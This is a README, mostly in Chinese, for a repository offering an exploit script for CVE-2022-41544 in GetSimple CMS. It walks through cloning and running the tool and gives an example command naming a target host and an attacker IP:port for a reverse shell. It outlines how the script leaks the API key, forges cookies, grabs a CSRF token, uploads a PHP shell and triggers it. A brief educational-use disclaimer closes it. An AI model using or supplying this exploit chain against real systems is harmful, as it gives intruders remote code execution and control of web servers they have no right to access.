
Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.
此仓库包含一个用于利用 GetSimple CMS 中 CVE-2022-41544 漏洞的脚本。该脚本执行多个步骤:检查漏洞、泄漏 API 密钥、设置 Cookie、获取 CSRF 令牌、上传 shell 以及触发 shell。
telnetlib 导入,该模块对脚本功能无影响。克隆仓库:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
安装依赖:
确保已安装 Python 3 和 requests 库。
pip3 install requests
运行脚本:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>:目标域名或 IP 地址。<path>:GetSimple CMS 安装路径。<ip:port>:用于反弹 shell 的 IP 和端口。<username>:GetSimple CMS 的管理员用户名。示例:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner():使用 ASCII 艺术显示风格化的横幅。get_version(target, path):检查目标 GetSimple CMS 版本是否存在漏洞。api_leak(target, path):尝试从授权 XML 文件中检索 API 密钥。set_cookies(username, version, apikey):根据检索到的 API 密钥设置后续请求所需的 Cookie。get_csrf_token(target, path, headers):提取上传 shell 所需的 CSRF 令牌。upload_shell(target, path, headers, nonce, shell_content):向目标服务器上传 PHP shell。shell_trigger(target, path):触发已上传的 shell 以建立反弹 shell 连接。main() 函数按顺序调用上述函数,以利用 CVE-2022-41544 漏洞完成整个利用过程。
此脚本由 h3x0v3rl0rd 开发。
本脚本仅用于教育目的。未经授权访问系统是非法且不道德的行为。请负责任地使用本脚本,并且只在你拥有明确测试权限的系统上使用。
本项目采用 MIT 许可证 - 详见 LICENSE 文件。